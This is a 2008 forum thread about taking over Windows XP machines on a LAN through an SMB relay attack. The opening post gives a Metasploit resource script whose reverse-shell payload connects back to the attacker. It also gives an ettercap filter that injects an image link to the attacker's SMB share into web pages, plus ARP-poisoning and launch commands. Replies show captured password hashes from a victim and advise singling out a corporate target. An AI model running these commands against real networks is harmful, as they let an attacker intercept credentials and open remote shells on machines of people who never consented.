Own Full patched XP box via HTTP

operat0r · #1 (**permalink**) 03-22-2008, 01:58 AM

update 7:27 PM 2/4/2009: http://www.tarasco.org/security/smbrelay/index.html

videos:

# with ettercap
http://s5.video.blip.tv/170000300628...console219.flv

# Thursday, 20 September 2007 ( not with ettercap )
http://www.learnsecurityonline.com/v...ay-reverse.swf

4:42 PM 4/25/2008:
"" I tried it with "Use simple file sharing" (recommended) checked...and the exploit WOULD NOT WORK. ""

sadly (sometimes !?!?!?) this is checked by default so I will look into some other things ...
you also want to check out the fastrack mass client side has GDI and QT exploits all in one etc ! ( this is part of the fast-track.py you must update it to current )

Firefox be design will not load a 'local share' this including \\SMB\image.jpg shares
( if anybody has a non javascript workaround please let me know FLASH also has the same security or just gets passed to firefox and then borks )

May be possible to use this trick 301 redirect the user to a local\share
http://forums.remote-exploit.org/programming/16014-replace-exe-msf-payload.html#post94904

What you need:
* ettercap
* ms framework3
* victim must have admin privs with no blank password and load an HTTP or HTTPS webpage.
* only works for MIM ( LAN etc .. )

** based on HD moore's presentation at Defcon that used WPAD http://video.google.co.uk/videoplay?...56903673801959 'Tactical Exploitation'

change the IP to your IP

smb.rc

Code:

use exploit/windows/smb/smb_relay
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.1.90
set LPORT 21
exploit

smb.filter

Code:

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("</body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>" ");
   replace("</Body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>" ");
   msg("Filter Ran.\n");
}

# etterfilter makes the smb.ef to use with ettercap

etterfilter smb.filter -o smb.ef
# run ettercap on target
ettercap -T -q -F smb.ef -M ARP // // -P autoadd

# start up msfconsole with the RC script
/pentest/exploits/framework3/msfconsole -r smb.rc

what happends ??

ettercap replaces IMG with \\yourip so then the victim trys to access your SMB_RELAY server for the IMG
then attacker say NO access denied ! victim says OK let me try my login by default

""Great job, but I got the well-known error message, which starts so:
"FAILED! The remote host has only provided us with Guest privileges...."""

read the error before that error the guest error just means the auth failed

Quote:

Originally Posted by www

5. On a Windows XP Pro computer, make sure that remote logons are not being coerced to the GUEST account (aka "ForceGuest", which is enabled by default computers that are not attached to a domain). To do this, open the Local Security Policy editor (e.g. by typing 'secpol.msc' into the Run box, without quotes). Expand the "Local Policies" node and select "Security Options". Now scroll down to the setting titled "Network access: Sharing and security model for local accounts". If this is set to "Guest only", change it to "Classic" and restart your computer.

unix_r00ter · #2 (**permalink**) 03-26-2008, 10:19 PM

does this only work on LAN??

Deathray · #3 (**permalink**) 03-26-2008, 10:23 PM

Very interesting ! I'm going to try it out right away.
I'll be back and tell how it went

Quote:

Originally Posted by unix_r00ter

does this only work on LAN??

Read up on MITM (man in the middle) attacks.

Deathray · #4 (**permalink**) 03-26-2008, 10:44 PM

Target: Windows XP SP0 no updates at all.
Ettercap

Code:

Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.

Msfconsole

Code:

msf exploit(smb_relay) >
[*] Received 192.168.1.78:1057 \ LMHASH:00 NTHASH: OS:Windows 2002 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.1.78:1057 \
[*] Received 192.168.1.78:1057 VICTIMLOSER\Victimlooser 
LMHASH:93d1db444663b9c09378060fe4c2aead62db490241055c20 
NTHASH:c3156deb18c7a6e6d800c39c451abcfe39baaa133d72058a OS:Windows 2002 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.1.78 as VICTIMLOSER\Victimlooser...
[*] Failed to authenticate as VICTIMLOSER\Victimlooser...

And by the way, I think you should lookup the rules about links in signatures.
I'm not sure if plain-text links are allowed. Just trying to keep you out of trouble

williamc · #5 (**permalink**) 03-27-2008, 12:24 AM

Couple of questions:
Must file sharing be enabled on the victim as mentioned in the presentation?

Is this for IE only? I'm seeing IE using <img src="\\ip\share\i.jpg> while Firefox is mozicon-url:file:////ip/share/i.jpg

operat0r · #6 (**permalink**) 03-27-2008, 02:11 AM

humm ill try it with FF and add the code if it works thanks !

Dr_GrEeN · #7 (**permalink**) 03-27-2008, 12:47 PM

Nice little audit, I wrote a tut similar to this last October check it out.

http://forum.remote-exploit.org/show...?t=9121&page=2

williamc · #8 (**permalink**) 03-27-2008, 05:17 PM

Can you clarify how this will affect a corporate network? Will all clients be routed through my client by default or can you limit it to those that type in your IP address in the web browser?

operat0r · #9 (**permalink**) 03-27-2008, 05:24 PM

Can you clarify how this will affect a corporate network?
total ownage if they have admin rights ( why ? because nobody has a blank password in a corp LAN )

Will all clients be routed through my client by default or can you limit it to those that type in your IP address in the web browser?
you need to read how MIM works and also read up on ettercap how it works etc
simply just make a target list insted of // // use the target IP /victomloser_CEO/ //